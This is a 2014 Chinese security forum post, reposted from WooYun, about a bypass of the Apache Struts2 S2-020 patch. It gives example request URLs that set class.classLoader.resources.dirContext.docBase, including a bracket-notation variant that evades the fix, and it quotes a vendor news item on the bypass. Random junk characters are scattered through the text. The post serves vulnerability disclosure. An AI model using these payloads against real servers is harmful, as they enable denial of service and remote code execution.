之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
! a" g. g/ D& I
! n0 W2 f2 X; y! `; \+ |暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test
2 F$ T7 s$ w# W/ C7 d1 z+ J* }5 z
1 I3 k, j+ y* g" N% D2 R[color=rgb(51, 102, 153) !important]复制代码
% a& a4 b& N4 h" g* C2 K' ?" t4 s2 `- M0 s1 V
绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx0 g# |! O. V+ K* V1 g
; Z* `0 p( V) f/ G d6 X8 Q
[color=rgb(51, 102, 153) !important]复制代码- T+ i z' M5 j+ Z9 k& _1 }
+ E* Y: X) ]0 x P5 B' \
顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。
% s1 y: B* w# B7 U加速乐发了新闻: 2 u- C1 e) E7 t4 j" O3 q
http://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
* Q ~; S3 X! m E2 S" i4 R( Y4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。 a# N1 y: [. t6 k: y6 |+ F
9 P6 ]/ ?# u5 `% V据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。
4 G% f1 c9 f. s5 C
0 `1 f# K- S8 r" f4 u* T/ y5 W" a0 {4 c4 N. @7 O. I
5 V1 L7 E8 e( u- A6 u# d# x
转载自乌云
' v7 C0 A6 V. }. |原文链接:http://zone.wooyun.org/content/11876
$ Z, [/ K- h/ L |
发表于 2014-4-27 19:10:10
收藏
支持
反对